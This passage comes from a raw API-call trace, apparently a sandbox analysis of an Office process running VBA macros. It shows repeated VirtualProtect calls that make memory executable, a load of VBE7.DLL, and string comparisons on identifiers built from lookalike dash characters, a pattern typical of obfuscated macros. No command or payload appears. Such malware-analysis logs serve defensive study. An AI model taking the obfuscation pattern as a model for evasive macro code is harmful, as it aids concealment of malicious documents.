dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.616] GetCurrentProcess () returned 0xffffffff [0105.616] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2d, dwSize=0x2) returned 1 [0105.617] GetCurrentProcess () returned 0xffffffff [0105.617] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4c, dwSize=0x14) returned 1 [0105.617] VirtualProtect (in: lpAddress=0xcaa6e4c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.617] GetCurrentProcess () returned 0xffffffff [0105.617] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4d, dwSize=0x2) returned 1 [0105.617] GetCurrentProcess () returned 0xffffffff [0105.617] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6c, dwSize=0x14) returned 1 [0105.617] VirtualProtect (in: lpAddress=0xcaa6e6c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.618] GetCurrentProcess () returned 0xffffffff [0105.618] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6d, dwSize=0x2) returned 1 [0105.618] GetCurrentProcess () returned 0xffffffff [0105.618] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8c, dwSize=0x14) returned 1 [0105.618] VirtualProtect (in: lpAddress=0xcaa6e8c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.618] GetCurrentProcess () returned 0xffffffff [0105.618] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8d, dwSize=0x2) returned 1 [0105.618] GetCurrentProcess () returned 0xffffffff [0105.618] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eac, dwSize=0x14) returned 1 [0105.618] VirtualProtect (in: lpAddress=0xcaa6eac, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.619] GetCurrentProcess () returned 0xffffffff [0105.619] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ead, dwSize=0x2) returned 1 [0105.619] GetCurrentProcess () returned 0xffffffff [0105.619] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecc, dwSize=0x14) returned 1 [0105.619] VirtualProtect (in: lpAddress=0xcaa6ecc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.619] GetCurrentProcess () returned 0xffffffff [0105.619] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecd, dwSize=0x2) returned 1 [0105.619] GetCurrentProcess () returned 0xffffffff [0105.619] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eec, dwSize=0x14) returned 1 [0105.619] VirtualProtect (in: lpAddress=0xcaa6eec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.620] GetCurrentProcess () returned 0xffffffff [0105.620] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eed, dwSize=0x2) returned 1 [0105.620] GetCurrentProcess () returned 0xffffffff [0105.620] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0c, dwSize=0x14) returned 1 [0105.620] VirtualProtect (in: lpAddress=0xcaa6f0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.621] GetCurrentProcess () returned 0xffffffff [0105.621] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0d, dwSize=0x2) returned 1 [0105.621] GetCurrentProcess () returned 0xffffffff [0105.621] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2c, dwSize=0x14) returned 1 [0105.621] VirtualProtect (in: lpAddress=0xcaa6f2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.621] GetCurrentProcess () returned 0xffffffff [0105.621] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2d, dwSize=0x2) returned 1 [0105.621] GetCurrentProcess () returned 0xffffffff [0105.621] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e0, dwSize=0x14) returned 1 [0105.621] VirtualProtect (in: lpAddress=0xcaa82e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.622] GetCurrentProcess () returned 0xffffffff [0105.622] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e1, dwSize=0x2) returned 1 [0105.622] GetCurrentProcess () returned 0xffffffff [0105.622] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8300, dwSize=0x14) returned 1 [0105.622] VirtualProtect (in: lpAddress=0xcaa8300, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.622] GetCurrentProcess () returned 0xffffffff [0105.622] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8301, dwSize=0x2) returned 1 [0105.622] GetCurrentProcess () returned 0xffffffff [0105.623] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8320, dwSize=0x14) returned 1 [0105.623] VirtualProtect (in: lpAddress=0xcaa8320, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.623] GetCurrentProcess () returned 0xffffffff [0105.623] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8321, dwSize=0x2) returned 1 [0105.623] GetCurrentProcess () returned 0xffffffff [0105.623] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8340, dwSize=0x14) returned 1 [0105.623] VirtualProtect (in: lpAddress=0xcaa8340, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.624] GetCurrentProcess () returned 0xffffffff [0105.624] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8341, dwSize=0x2) returned 1 [0105.624] GetCurrentProcess () returned 0xffffffff [0105.624] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8360, dwSize=0x14) returned 1 [0105.624] VirtualProtect (in: lpAddress=0xcaa8360, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.624] GetCurrentProcess () returned 0xffffffff [0105.624] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8361, dwSize=0x2) returned 1 [0105.624] GetCurrentProcess () returned 0xffffffff [0105.624] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8380, dwSize=0x14) returned 1 [0105.624] VirtualProtect (in: lpAddress=0xcaa8380, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.625] GetCurrentProcess () returned 0xffffffff [0105.625] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8381, dwSize=0x2) returned 1 [0105.625] GetCurrentProcess () returned 0xffffffff [0105.625] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a0, dwSize=0x14) returned 1 [0105.625] VirtualProtect (in: lpAddress=0xcaa83a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.625] GetCurrentProcess () returned 0xffffffff [0105.625] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a1, dwSize=0x2) returned 1 [0105.625] GetCurrentProcess () returned 0xffffffff [0105.625] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c0, dwSize=0x14) returned 1 [0105.625] VirtualProtect (in: lpAddress=0xcaa83c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.626] GetCurrentProcess () returned 0xffffffff [0105.626] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c1, dwSize=0x2) returned 1 [0105.626] GetCurrentProcess () returned 0xffffffff [0105.626] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e0, dwSize=0x14) returned 1 [0105.626] VirtualProtect (in: lpAddress=0xcaa83e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.627] GetCurrentProcess () returned 0xffffffff [0105.627] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e1, dwSize=0x2) returned 1 [0105.627] GetCurrentProcess () returned 0xffffffff [0105.627] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8400, dwSize=0x14) returned 1 [0105.627] VirtualProtect (in: lpAddress=0xcaa8400, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.628] GetCurrentProcess () returned 0xffffffff [0105.628] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8401, dwSize=0x2) returned 1 [0105.628] GetCurrentProcess () returned 0xffffffff [0105.628] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8420, dwSize=0x14) returned 1 [0105.628] VirtualProtect (in: lpAddress=0xcaa8420, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.628] GetCurrentProcess () returned 0xffffffff [0105.628] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8421, dwSize=0x2) returned 1 [0105.628] GetCurrentProcess () returned 0xffffffff [0105.628] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8440, dwSize=0x14) returned 1 [0105.628] VirtualProtect (in: lpAddress=0xcaa8440, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.629] GetCurrentProcess () returned 0xffffffff [0105.629] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8441, dwSize=0x2) returned 1 [0105.629] GetCurrentProcess () returned 0xffffffff [0105.629] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8460, dwSize=0x14) returned 1 [0105.629] VirtualProtect (in: lpAddress=0xcaa8460, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.630] GetCurrentProcess () returned 0xffffffff [0105.630] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8461, dwSize=0x2) returned 1 [0105.630] GetCurrentProcess () returned 0xffffffff [0105.630] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8480, dwSize=0x14) returned 1 [0105.630] VirtualProtect (in: lpAddress=0xcaa8480, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.630] GetCurrentProcess () returned 0xffffffff [0105.630] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8481, dwSize=0x2) returned 1 [0105.631] GetCurrentProcess () returned 0xffffffff [0105.631] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a0, dwSize=0x14) returned 1 [0105.631] VirtualProtect (in: lpAddress=0xcaa84a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.631] GetCurrentProcess () returned 0xffffffff [0105.631] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a1, dwSize=0x2) returned 1 [0105.631] GetCurrentProcess () returned 0xffffffff [0105.631] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c0, dwSize=0x14) returned 1 [0105.631] VirtualProtect (in: lpAddress=0xcaa84c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.632] GetCurrentProcess () returned 0xffffffff [0105.632] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c1, dwSize=0x2) returned 1 [0105.632] GetCurrentProcess () returned 0xffffffff [0105.632] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6288, dwSize=0x14) returned 1 [0105.632] VirtualProtect (in: lpAddress=0xcaa6288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.633] GetCurrentProcess () returned 0xffffffff [0105.633] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6289, dwSize=0x2) returned 1 [0105.633] GetCurrentProcess () returned 0xffffffff [0105.633] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a8, dwSize=0x14) returned 1 [0105.633] VirtualProtect (in: lpAddress=0xcaa62a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.633] GetCurrentProcess () returned 0xffffffff [0105.633] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a9, dwSize=0x2) returned 1 [0105.633] GetCurrentProcess () returned 0xffffffff [0105.633] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c8, dwSize=0x14) returned 1 [0105.633] VirtualProtect (in: lpAddress=0xcaa62c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.634] GetCurrentProcess () returned 0xffffffff [0105.634] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c9, dwSize=0x2) returned 1 [0105.634] SetErrorMode (uMode=0x8001) returned 0x8001 [0105.634] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0105.634] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x681f0000 [0105.635] SetErrorMode (uMode=0x8001) returned 0x8001 [0105.635] GetProcAddress (hModule=0x681f0000, lpProcName=0x278) returned 0x682763c4 [0105.637] GetAsyncKeyState (vKey=3) returned 0 [0105.637] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.637] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.637] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.637] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.637] CRetailMalloc_Alloc () returned 0xcad6050 [0105.637] memcpy (in: _Dst=0xaf5168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.638] memcpy (in: _Dst=0xaf5270, _Src=0x197404, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0105.638] memcpy (in: _Dst=0xaf5168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d50386, cbMultiByte=5, lpWideCharStr=0x197204, cchWideChar=6 | out: lpWideCharStr="CDec") returned 5 [0105.638] CRetailMalloc_Realloc () returned 0xb2e1298 [0105.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9c30386, cbMultiByte=5, lpWideCharStr=0x197264, cchWideChar=6 | out: lpWideCharStr="CDec") returned 5 [0105.638] CRetailMalloc_Realloc () returned 0xb3c9130 [0105.639] memcpy (in: _Dst=0xaf5168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.639] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x97\x96\x96\x97\x97\x97\x96\x97\x97\x97\x97\x97\x96\x97\x96\x96\x96\x97\x96\x96\x97\x97\x96\x97", cchCount1=-1, lpString2="\x96\x97\x97\x97\x97\x97\x96\x97\x97\x96\x97\x96\x97\x96\x96\x97\x97\x96\x97\x96\x96\x96\x97\x96\x97\x96", cchCount2=-1) returned 3 [0105.639] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x97\x96\x97\x97\x97\x97\x97\x97\x96\x96\x96\x96\x96\x97\x97\x96\x96\x97\x97\x97\x97\x96\x96\x96", cchCount1=-1, lpString2="\x96\x97\x97\x97\x97\x97\x96\x97\x97\x96\x97\x96\x97\x96\x96\x97\x97\x96\x97\x96\x96\x96\x97\x96\x97\x96", cchCount2=-1) returned 3 [0105.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d52e8a, cbMultiByte=27, lpWideCharStr=0x197204, cchWideChar=28 | out: lpWideCharStr="–—————–——–—–—––——–—–––—–—–") returned 27 [0105.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d10906, cbMultiByte=27, lpWideCharStr=0x197264, cchWideChar=28 | out: lpWideCharStr="–—————–——–—–—––——–—–––—–—–") returned 27 [0105.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d10906, cbMultiByte=27, lpWideCharStr=0x197264, cchWideChar=28 | out: lpWideCharStr="–—————–——–—–—––——–—–––—–—–") returned 27 [0105.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d10906, cbMultiByte=27, lpWideCharStr=0x197264, cchWideChar=28 | out: lpWideCharStr="–—————–——–—–—––——–—–––—–—–") returned 27 [0105.640] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x97\x96\x96\x97\x97\x97\x96\x97\x97\x97\x97\x97\x96\x97\x96\x96\x96\x97\x96\x96\x97\x97\x96\x97", cchCount1=-1, lpString2="\x96\x97\x97\x97\x97\x97\x96\x97\x97\x96\x97\x96\x97\x96\x96\x97\x97\x96\x97\x96\x96\x96\x97\x96\x97\x96", cchCount2=-1) returned 3 [0105.640] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x97\x96\x97\x97\x97\x97\x97\x97\x96\x96\x96\x96\x96\x97\x97\x96\x96\x97\x97\x97\x97\x96\x96\x96", cchCount1=-1, lpString2="\x96\x97\x97\x97\x97\x97\x96\x97\x97\x96\x97\x96\x97\x96\x96\x97\x97\x96\x97\x96\x96\x96\x97\x96\x97\x96", cchCount2=-1) returned 3 [0105.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d10906, cbMultiByte=27, lpWideCharStr=0x197264, cchWideChar=28 | out: lpWideCharStr="–—————–——–—–—––——–—–––—–—–") returned 27 [0105.640] CRetailMalloc_Alloc () returned 0xc8482c0 [0105.640] _mbscpy_s (in: _Dst=0xc8482c0, _DstSizeInBytes=0x1b, _Src=0x9d10906 | out: _Dst=0xc8482c0) returned 0x0 [0105.640] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="_B_var_\x97\x97\x97\x96\x97\x97\x97\x97\x97\x97\x96\x96\x96\x96\x96\x97\x97\x96\x96\x97\x97\x97\x97\x96\x96\x96", cchCount1=-1, lpString2="_B_var_\x96\x97\x97\x97\x97\x97\x96\x97\x97\x96\x97\x96\x97\x96\x96\x97\x97\x96\x97\x96\x96\x96\x97\x96\x97\x96", cchCount2=-1) returned 3 [0105.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d10bee, cbMultiByte=34, lpWideCharStr=0x197274, cchWideChar=35 | out: lpWideCharStr="_B_var_–—————–——–—–—––——–—–––—–—–") returned 34 [0105.641] _mbscpy_s (in: _Dst=0x1972dc, _DstSizeInBytes=0x1b, _Src=0x9d10906 | out: _Dst=0x1972dc) returned 0x0 [0105.641] CRetailMalloc_Free () returned 0x1 [0105.641] memcpy (in: _Dst=0xaf5270, _Src=0xaf5270, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0105.641] memcpy (in: _Dst=0xaf5168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.641] memcpy (in: _Dst=0xaf516c, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0105.641] memcpy (in: _Dst=0xaf5168, _Src=0x197254, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.641] memcpy (in: _Dst=0xaf5168, _Src=0x197254, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.641] memcpy (in: _Dst=0xaf5168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.641] memcpy (in: _Dst=0xaf5168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6842ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0105.642] memcpy (in: _Dst=0xcad60c8, _Src=0x197484, _Size=0x18 | out: _Dst=0xcad60c8) returned 0xcad60c8 [0105.642] CRetailMalloc_Realloc () returned 0xcad6050 [0105.642] CRetailMalloc_Free () returned 0x1 [0105.642] GetCurrentProcess () returned 0xffffffff [0105.642] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcc, dwSize=0x14) returned 1 [0105.642] VirtualProtect (in: lpAddress=0xcaa6dcc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.643] GetCurrentProcess () returned 0xffffffff [0105.643] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcd, dwSize=0x2) returned 1 [0105.643] GetCurrentProcess () returned 0xffffffff [0105.643] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dec, dwSize=0x14) returned 1 [0105.643] VirtualProtect (in: lpAddress=0xcaa6dec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.643] GetCurrentProcess () returned 0xffffffff [0105.643] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ded, dwSize=0x2) returned 1 [0105.643] GetCurrentProcess () returned 0xffffffff [0105.643] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0c, dwSize=0x14) returned 1 [0105.643] VirtualProtect (in: lpAddress=0xcaa6e0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.644] GetCurrentProcess () returned 0xffffffff [0105.644] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0d, dwSize=0x2) returned 1 [0105.644] GetCurrentProcess () returned 0xffffffff [0105.644] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2c, dwSize=0x14) returned 1 [0105.644] VirtualProtect (in: lpAddress=0xcaa6e2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.645] GetCurrentProcess () returned 0xffffffff [0105.645] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2d, dwSize=0x2) returned 1 [0105.645] GetCurrentProcess () returned 0xffffffff [0105.645] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4c, dwSize=0x14) returned 1 [0105.645] VirtualProtect (in: lpAddress=0xcaa6e4c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.645] GetCurrentProcess () returned 0xffffffff [0105.645] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4d, dwSize=0x2) returned 1 [0105.645] GetCurrentProcess () returned 0xffffffff [0105.645] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6c, dwSize=0x14) returned 1 [0105.645] VirtualProtect (in: lpAddress=0xcaa6e6c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.646] GetCurrentProcess () returned 0xffffffff [0105.646] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6d, dwSize=0x2) returned 1 [0105.646] GetCurrentProcess () returned 0xffffffff [0105.646] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8c, dwSize=0x14) returned 1 [0105.646] VirtualProtect (in: lpAddress=0xcaa6e8c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.647] GetCurrentProcess () returned 0xffffffff [0105.647] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8d, dwSize=0x2) returned 1 [0105.647] GetCurrentProcess () returned 0xffffffff [0105.647] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eac, dwSize=0x14) returned 1 [0105.647] VirtualProtect (in: lpAddress=0xcaa6eac, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.647] GetCurrentProcess () returned 0xffffffff [0105.647] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ead, dwSize=0x2) returned 1 [0105.647] GetCurrentProcess () returned 0xffffffff [0105.648] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecc, dwSize=0x14) returned 1 [0105.648] VirtualProtect (in: lpAddress=0xcaa6ecc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.648] GetCurrentProcess () returned 0xffffffff [0105.648] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecd, dwSize=0x2) returned 1 [0105.648] GetCurrentProcess () returned 0xffffffff [0105.648] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eec, dwSize=0x14) returned 1 [0105.648] VirtualProtect (in: lpAddress=0xcaa6eec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.649] GetCurrentProcess () returned 0xffffffff [0105.649] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eed, dwSize=0x2) returned 1 [0105.649] GetCurrentProcess () returned 0xffffffff [0105.649] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0c, dwSize=0x14) returned 1 [0105.649] VirtualProtect (in: lpAddress=0xcaa6f0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.649] GetCurrentProcess () returned 0xffffffff [0105.650] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0d, dwSize=0x2) returned 1 [0105.650] GetCurrentProcess () returned 0xffffffff [0105.650] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2c, dwSize=0x14) returned 1 [0105.650] VirtualProtect (in: lpAddress=0xcaa6f2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.650] GetCurrentProcess () returned 0xffffffff [0105.650] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2d, dwSize=0x2) returned 1 [0105.650] GetCurrentProcess () returned 0xffffffff [0105.650] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e0, dwSize=0x14) returned 1 [0105.650] VirtualProtect (in: lpAddress=0xcaa82e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.651] GetCurrentProcess () returned 0xffffffff [0105.768] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e1, dwSize=0x2) returned 1 [0105.768] GetCurrentProcess () returned 0xffffffff [0105.768] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8300, dwSize=0x14) returned 1 [0105.768] VirtualProtect (in: lpAddress=0xcaa8300, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.770] GetCurrentProcess () returned 0xffffffff [0105.771] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8301, dwSize=0x2) returned 1 [0105.771] GetCurrentProcess () returned 0xffffffff [0105.771] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8320, dwSize=0x14) returned 